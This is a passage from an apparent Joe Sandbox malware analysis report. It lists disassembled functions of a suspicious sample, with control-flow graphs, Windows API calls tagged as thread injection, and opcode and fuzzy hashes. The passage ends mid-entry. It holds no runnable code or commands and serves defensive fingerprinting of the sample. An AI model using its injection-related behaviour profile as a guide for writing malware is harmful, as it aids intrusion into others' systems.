                                                    • Instruction Fuzzy Hash: 22515C71E0964ADFEB48DBA8C4545BDBBB1FF49700F1481BED01EE7292CA34A905CB80
                                                    Function 00007FFAACDA012D Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 395 7ffaacda012d-7ffaacda0157 398 7ffaacda028b-7ffaacda02a6 395->398 399 7ffaacda015d-7ffaacda01cd 395->399 403 7ffaacda02a8 398->403 404 7ffaacda02ad-7ffaacda02ba 398->404 411 7ffaacda01d4-7ffaacda01df 399->411 403->404 411->399 412 7ffaacda01e5 411->412 412->398
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S$r6S
                                                    • API String ID: 0-1821043251
                                                    • Opcode ID: 361ad472be8723c6e4b2117963c8a143ef6c3b6ce45e833a3888f9d8538e74cb
                                                    • Instruction ID: 427b36b9f3ff453adc8da6c1dc2655266f3f06eae75f90b8b077d7f31b2845b7
                                                    • Opcode Fuzzy Hash: 361ad472be8723c6e4b2117963c8a143ef6c3b6ce45e833a3888f9d8538e74cb
                                                    • Instruction Fuzzy Hash: 5C316372B19A0A8FE748DB58D4915E8B7A1FF4A710B108279D01FD7682CF24B816CBC0
                                                    Function 00007FFAACDA01EA Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 413 7ffaacda01ea-7ffaacda020c 416 7ffaacda027d-7ffaacda028b call 7ffaacda03ff 413->416 417 7ffaacda020e-7ffaacda0210 413->417 419 7ffaacda028c-7ffaacda02a6 416->419 418 7ffaacda0212 417->418 417->419 421 7ffaacda0214-7ffaacda0215 418->421 422 7ffaacda0216 418->422 428 7ffaacda02a8 419->428 429 7ffaacda02ad-7ffaacda02b5 419->429 421->422 425 7ffaacda0218-7ffaacda0236 422->425 426 7ffaacda024e-7ffaacda0277 422->426 435 7ffaacda02a7-7ffaacda02ac 425->435 436 7ffaacda0238-7ffaacda023a 425->436 426->416 428->429 432 7ffaacda02b6-7ffaacda02ba 429->432 435->429 436->432 437 7ffaacda023c 436->437 439 7ffaacda023f-7ffaacda0241 437->439 440 7ffaacda023e 437->440 441 7ffaacda024b-7ffaacda024c 439->441 440->439 441->426
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S$r6S
                                                    • API String ID: 0-1821043251
                                                    • Opcode ID: 91ed76f465679ea9faf8a339f46ed3d27eebe334f3a5a7e531649a1ad0a172a2
                                                    • Instruction ID: 268b4c92e721179a2bfbb19e12bb9531e2351f2a62d52bc752d548c6c02b208b
                                                    • Opcode Fuzzy Hash: 91ed76f465679ea9faf8a339f46ed3d27eebe334f3a5a7e531649a1ad0a172a2
                                                    • Instruction Fuzzy Hash: 4531C772A0DB4ACFFB49976894626E977D1FF86710F04417AD05FC7282DE18B84986C1
                                                    Function 00007FFAACDA3744 Relevance: 1.8, Instructions: 1823COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 442 7ffaacda3744-7ffaacda3763 444 7ffaacda3769-7ffaacda37f3 442->444 445 7ffaacda4d8a-7ffaacda4da8 call 7ffaacda4f2d call 7ffaacda4f7d 442->445 457 7ffaacda37f5-7ffaacda3828 444->457 458 7ffaacda382d-7ffaacda390c 444->458 461 7ffaacda3912-7ffaacda39ad 457->461 458->461 473 7ffaacda39e7-7ffaacda3ac6 461->473 474 7ffaacda39af-7ffaacda39e2 461->474 477 7ffaacda3acc-7ffaacda3b67 473->477 474->477 489 7ffaacda3b73-7ffaacda3c18 477->489 490 7ffaacda3b69-7ffaacda3b6e 477->490 491 7ffaacda3c1c-7ffaacda3caf 489->491 490->491 501 7ffaacda3cbb-7ffaacda3d61 491->501 502 7ffaacda3cb1-7ffaacda3cb6 491->502 503 7ffaacda3d64-7ffaacda3df7 501->503 502->503 513 7ffaacda3df9-7ffaacda3e2c 503->513 514 7ffaacda3e31-7ffaacda3f10 503->514 517 7ffaacda3f16-7ffaacda3fb1 513->517 514->517 529 7ffaacda3fb3-7ffaacda3fe6 517->529 530 7ffaacda3feb-7ffaacda415b 517->530 533 7ffaacda4161-7ffaacda41fc 529->533 530->533 546 7ffaacda4236-7ffaacda43a6 533->546 547 7ffaacda41fe-7ffaacda4231 533->547 551 7ffaacda43ac-7ffaacda4447 546->551 547->551 566 7ffaacda4449-7ffaacda447c 551->566 567 7ffaacda4481-7ffaacda4560 551->567 571 7ffaacda4566-7ffaacda4601 566->571 567->571 585 7ffaacda4603-7ffaacda4636 571->585 586 7ffaacda463b-7ffaacda471a 571->586 590 7ffaacda4720-7ffaacda47bb 585->590 586->590 601 7ffaacda47f5-7ffaacda4965 590->601 602 7ffaacda47bd-7ffaacda47f0 590->602 605 7ffaacda496b-7ffaacda4a06 601->605 602->605 618 7ffaacda4a08-7ffaacda4a3b 605->618 619 7ffaacda4a40-7ffaacda4bb0 605->619 623 7ffaacda4bb6-7ffaacda4c51 618->623 619->623 638 7ffaacda4c53-7ffaacda4c58 623->638 639 7ffaacda4c5d-7ffaacda4d7e 623->639 640 7ffaacda4d81-7ffaacda4d84 638->640 639->640 640->445
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98ef179259e19c441314e99f242e7264fdb810ec9011bfcf9ce5fa9e975a5bf2
                                                    • Instruction ID: e8269ca1e55f0dd98db3325fd52ecce7eab9731676b7bc1995272997d596110f
                                                    • Opcode Fuzzy Hash: 98ef179259e19c441314e99f242e7264fdb810ec9011bfcf9ce5fa9e975a5bf2
                                                    • Instruction Fuzzy Hash: 6BF28670A4891D8FDF98EB18C894FA9B7B1FB69301F5441E9D00ED76A1DA31AE81CF44
                                                    Function 00007FFAAC800040 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 652 7ffaac800040-7ffaac800079 653 7ffaac80007c-7ffaac800152 ResumeThread 652->653 654 7ffaac80007b 652->654 658 7ffaac800154 653->658 659 7ffaac80015a-7ffaac8001a4 653->659 654->653 658->659
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 2dde6635500fa5eaf0ec64d172a51eaf854afa322a4be1ce8ac710c3ef8e60fe
                                                    • Instruction ID: cf7bb56abe947bfeab55c48cb8dad3f0cdee6f3d84974ef163274d8e27603f8c
                                                    • Opcode Fuzzy Hash: 2dde6635500fa5eaf0ec64d172a51eaf854afa322a4be1ce8ac710c3ef8e60fe
                                                    • Instruction Fuzzy Hash: BA516B7090878C8FDB55DBA8D855AE9BFF0FF5A310F1481AFD049DB292CA349846CB51
                                                    Function 00007FFAAC7FE84D Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 662 7ffaac7fe84d-7ffaac7fe859 663 7ffaac7fe864-7ffaac7fe932 SuspendThread 662->663 664 7ffaac7fe85b-7ffaac7fe863 662->664 668 7ffaac7fe934 663->668 669 7ffaac7fe93a-7ffaac7fe984 663->669 664->663 668->669
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 2b2768aa4d5e22c7148d4452451a85c93a016f08cc6192356e1dc0266c17dfb8
                                                    • Instruction ID: c9eb7b8c50dddce7393aa4d7f4076960a58f298063c003fe90ccb6d6cde683f1
                                                    • Opcode Fuzzy Hash: 2b2768aa4d5e22c7148d4452451a85c93a016f08cc6192356e1dc0266c17dfb8
                                                    • Instruction Fuzzy Hash: 2B412870D0864D8FDB98DFA8D885AADBBF0FB5A311F10416AD04DE7292DA70A845CB41
                                                    Function 00007FFAAC801E35 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 672 7ffaac801e35-7ffaac801f13 GetFileAttributesW 676 7ffaac801f15 672->676 677 7ffaac801f1b-7ffaac801f59 672->677 676->677
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 3fcf4effe5a261eb33a53b74101eac691248e28ffb67139ee462bc1e5c5479f0
                                                    • Instruction ID: cb293e4885c2746e246c04530d2661706f74fc7d7386568437c5175f6e646a2e
                                                    • Opcode Fuzzy Hash: 3fcf4effe5a261eb33a53b74101eac691248e28ffb67139ee462bc1e5c5479f0
                                                    • Instruction Fuzzy Hash: 7441F870908A5C8FDB98DF98D885BEDBBF1FB5A311F1041AAD009E7252DA71A845CF41
                                                    Function 00007FFAACDAC3C2 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 679 7ffaacdac3c2-7ffaacdac5fd 696 7ffaacdac606-7ffaacdac619 679->696
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S
                                                    • API String ID: 0-2983709088
                                                    • Opcode ID: 4d5c7c84d269b582f099b748a71b2ac16dfa8b07a14745e90851737c229eca97
                                                    • Instruction ID: 1187692dc1f2645ee5279f3e8a7b0102ad44fc7c940453df58dbf5e79a2fe2a7
                                                    • Opcode Fuzzy Hash: 4d5c7c84d269b582f099b748a71b2ac16dfa8b07a14745e90851737c229eca97
                                                    • Instruction Fuzzy Hash: 2F71A77094895C8FDF99EB18C899FA8B7B1FB68701F5441E9D00EE7661CA71AE81CF40
                                                    Function 00007FFAAC8001A9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 698 7ffaac8001a9-7ffaac8001b5 699 7ffaac8001b7-7ffaac8001bf 698->699 700 7ffaac8001c0-7ffaac800292 CloseHandle 698->700 699->700 704 7ffaac800294 700->704 705 7ffaac80029a-7ffaac8002ee 700->705 704->705
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 2e33cde8ae159ed666568a971e40d02a1209e605fc3999b8ee98667f1d388c11
                                                    • Instruction ID: 662fe87ce1c41acb8368b5a12af988704be41e69b08ea826b483f2631e6f1def
                                                    • Opcode Fuzzy Hash: 2e33cde8ae159ed666568a971e40d02a1209e605fc3999b8ee98667f1d388c11
                                                    • Instruction Fuzzy Hash: F0416C7090865C8FDB59DFA8C888BECBBF0FB1A310F1041AAD049E7292DA74A845CB41
                                                    Function 00007FFAAC65AF17 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7
                                                    • API String ID: 0-1790921346
                                                    • Opcode ID: e568913f38823375d7cbdbfee025aefd321136dffaff84e561acf926f46a4cae
                                                    • Instruction ID: 5f92883930ca280bde1cdf6b9b4bb966f216521bf5d29f5ce94325c1de3068fc
                                                    • Opcode Fuzzy Hash: e568913f38823375d7cbdbfee025aefd321136dffaff84e561acf926f46a4cae
                                                    • Instruction Fuzzy Hash: E0F03071A1951E8FF731DB18C840BBEB7A1FB45704F6092F9C00E97286DF7899869B80
                                                    Function 00007FFAACDAC61C Relevance: 1.2, Instructions: 1243COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4c58fc6742a63ed2f291c830da7a7bde5a31d1664fd084c66a73b970966f362
                                                    • Instruction ID: 07fdfc19723307cca49a662ddfacd8cf3ab01cc33f5f3621e025ce1f458003a6
                                                    • Opcode Fuzzy Hash: f4c58fc6742a63ed2f291c830da7a7bde5a31d1664fd084c66a73b970966f362
                                                    • Instruction Fuzzy Hash: 35B24274A4891C8FDF99EF18C894FA9B7B1FB68305F5041D9910EE76A1DA31AE81CF40
                                                    Function 00007FFAACDAEF65 Relevance: .7, Instructions: 660COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f802c25e0c99052feb3affed0d8a90c32b49be0db8b18a33226b60f47489981
                                                    • Instruction ID: 1214e407d7c863e3872d24f0cf537de943f89073884648a90b2485d6c0fd7bd1
                                                    • Opcode Fuzzy Hash: 7f802c25e0c99052feb3affed0d8a90c32b49be0db8b18a33226b60f47489981
                                                    • Instruction Fuzzy Hash: 6642AB70A4991D8FDF98EB18C898FA9B7B1FB69301F5041E9D00ED76A1DA31AD85CF40
                                                    Function 00007FFAACDAE060 Relevance: .5, Instructions: 527COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 534d681daae66b3cd6899ddd1ac0016f442d85d6437a9ce12c8e7b89c6554cb5
                                                    • Instruction ID: 63c7e1912651770efe4c9d8d2550915331cac4fb7b93901250396a75a0de3835
                                                    • Opcode Fuzzy Hash: 534d681daae66b3cd6899ddd1ac0016f442d85d6437a9ce12c8e7b89c6554cb5
                                                    • Instruction Fuzzy Hash: F7222274A4492D8FDF99EF18C898FA9B7B1FB69301F5041D9900EE7661DA31AE81CF40
                                                    Function 00007FFAACDAF027 Relevance: .5, Instructions: 486COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40ce87839e005911e412cef21568944acef73b085faed96706526b7f9f34079d
                                                    • Instruction ID: 39bce13a44a5edb819f47f3a8d4b1284baebe0582cf5bbcfb97623f368e4e100
                                                    • Opcode Fuzzy Hash: 40ce87839e005911e412cef21568944acef73b085faed96706526b7f9f34079d
                                                    • Instruction Fuzzy Hash: 0802AB71A0991D8FDF98EB18C898FA9B7B1FB69300F5041E9D00ED76A1DA31AD85CF40
                                                    Function 00007FFAACDAA9E6 Relevance: .5, Instructions: 481COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3bf0633aaddb9b2fcc6e10ef6cb707a900e2596fa366d35e751b1c6a8a96a77
                                                    • Instruction ID: 8f3391f49fb00bcf2f6c5a15794a776a8dab49a0cd1d4949dab4fc5ec5c5bb21
                                                    • Opcode Fuzzy Hash: c3bf0633aaddb9b2fcc6e10ef6cb707a900e2596fa366d35e751b1c6a8a96a77
                                                    • Instruction Fuzzy Hash: 83F16F70609A8D8FEBB9EF28C855BE937E1FF59301F00416AD84EDB291DB749584CB81
                                                    Function 00007FFAACDA2991 Relevance: .4, Instructions: 408COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54717a8a60327b7e8e05bd1bc1f0639686c5295d30ff383a6a52b5f4f28efcbf
                                                    • Instruction ID: d875156f45a52cc0e906806e8f2ea0595a187ad31f63facb15dd58cbdc34123c
                                                    • Opcode Fuzzy Hash: 54717a8a60327b7e8e05bd1bc1f0639686c5295d30ff383a6a52b5f4f28efcbf
                                                    • Instruction Fuzzy Hash: BCD1EE30A0EB06CFE368CB29D49157577E1FF46700B14857EC4AEC3696DA29F84A8BC1
                                                    Function 00007FFAACDA196F Relevance: .3, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a98b0c5344cd040d5c8aff9d140c254d2ebdb619b941f47029e0f1dc01f8d7d
                                                    • Instruction ID: 35e222978173c888b827f274290b08101c6c3d536a690350ac63e8b4ca3a9a2b
                                                    • Opcode Fuzzy Hash: 1a98b0c5344cd040d5c8aff9d140c254d2ebdb619b941f47029e0f1dc01f8d7d
                                                    • Instruction Fuzzy Hash: ABC19130A1A656CBFB0DCF14C0D06B577A1FF46310B5485BDD86F8B68ADA38E449CB85
                                                    Function 00007FFAACDAE730 Relevance: .3, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f66648a39043bab4d50716978014256fd83087011e78503444680a4ae3ae600b
                                                    • Instruction ID: b139e3c5871ede55c5cec893dce4591276101d27d662b6d5047942b712eced1d
                                                    • Opcode Fuzzy Hash: f66648a39043bab4d50716978014256fd83087011e78503444680a4ae3ae600b
                                                    • Instruction Fuzzy Hash: A9D16334A4891C8FDFA9EB18C894FA9B7B5FB68701F5041D9D00EE7660DA71AE85CF40
                                                    Function 00007FFAACDB1B79 Relevance: .3, Instructions: 307COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57bb829b95a957284cc105dddc5807a6d59b7a9a252fd84fb5ac9e1dfa7b4bd1
                                                    • Instruction ID: 01b9271ccdcec65e863ea2d0ee640d76979d23a8e0968cd648f13a6de5349b77
                                                    • Opcode Fuzzy Hash: 57bb829b95a957284cc105dddc5807a6d59b7a9a252fd84fb5ac9e1dfa7b4bd1
                                                    • Instruction Fuzzy Hash: A991E531A09E098FFF99EB58D4556A977E1FFAA301B04417ED00ED7292DE24EC468BC0
                                                    Function 00007FFAACDB0F48 Relevance: .3, Instructions: 273COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dda9ec228b9fcb25b161ff3b17d58ab8f77506db20840037e865fb1f017a22ac
                                                    • Instruction ID: ec4e9c1e12d0a81384a24d3702183bdac55e8cc1218ec5d13e121aadc511cae7
                                                    • Opcode Fuzzy Hash: dda9ec228b9fcb25b161ff3b17d58ab8f77506db20840037e865fb1f017a22ac
                                                    • Instruction Fuzzy Hash: F071A47271DA068FF758AB28D4419B6B3E1FFA9310710817AD09EC3597DE25F8468784
                                                    Function 00007FFAACDA6321 Relevance: .3, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0981930f774d8f132f0ae2f48543c0b09f697a4b82f2d8f27e461540d6af872b
                                                    • Instruction ID: b070534bceeae9726151f0033161eadf5f3b8776342c4a3e4d76f3ecd9748e46
                                                    • Opcode Fuzzy Hash: 0981930f774d8f132f0ae2f48543c0b09f697a4b82f2d8f27e461540d6af872b
                                                    • Instruction Fuzzy Hash: DA911974908A1D8FDB98DF58C845BE9BBF1FB69310F1082AAD40DE3255CB74A985CF81
                                                    Function 00007FFAACDA0746 Relevance: .3, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73205b131fc17ee860632ab29b0b5ad893288973ed129144ff6859dedaa8a9ed
                                                    • Instruction ID: 38b42753cf1501ac8607bada6599a566d04d0b57ea730755e0b0aebf8da436d0
                                                    • Opcode Fuzzy Hash: 73205b131fc17ee860632ab29b0b5ad893288973ed129144ff6859dedaa8a9ed
                                                    • Instruction Fuzzy Hash: 07812831A0E642CFF7296B289451579B7E0EF46710B14857ED09FC3193DE28F44A8BD5
                                                    Function 00007FFAACDB1F89 Relevance: .2, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 774404ef22cc926fa6d85a7e8610825704ee5ebc12556546b8ed811133944632
                                                    • Instruction ID: 4b733f99420a40ec053fabddf0fa02e5089b2a5b1304c37721f2116d4da5a90d
                                                    • Opcode Fuzzy Hash: 774404ef22cc926fa6d85a7e8610825704ee5ebc12556546b8ed811133944632
                                                    • Instruction Fuzzy Hash: 7451B372B19A0A8FFB69AB18C440976B3E1FF69310714827AD05EC3697DE34FC468780
                                                    Function 00007FFAAC6508E8 Relevance: .2, Instructions: 208COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba5ddc768d99d883773b1158692956dfe62f65016f523414ee8b42b5dd3e4f5e
                                                    • Instruction ID: 12a4682e73ed753d64c1b2038b8f843d4bfcc96bc3336d75d1e7a31ec6f7295e
                                                    • Opcode Fuzzy Hash: ba5ddc768d99d883773b1158692956dfe62f65016f523414ee8b42b5dd3e4f5e
                                                    • Instruction Fuzzy Hash: 2D714A729086199FDF44EF68D494EED7BF0FF59324B04517AE449D7262CB24E880CB80
                                                    Function 00007FFAACDB19B8 Relevance: .2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7a9e6b6880f0739ec2b4967457a39917b22263e0520bad542504d02e607e9ab
                                                    • Instruction ID: d62ffdd8477571212f05cb215cd04d2ae8e483af9989a2e620ede410d739bc20
                                                    • Opcode Fuzzy Hash: d7a9e6b6880f0739ec2b4967457a39917b22263e0520bad542504d02e607e9ab
                                                    • Instruction Fuzzy Hash: E5515B22B0DE4A4FF7A4A72C94556B677E1FF5A35170481BED04EC3297DD19EC0A8380
                                                    Function 00007FFAACDB1811 Relevance: .2, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
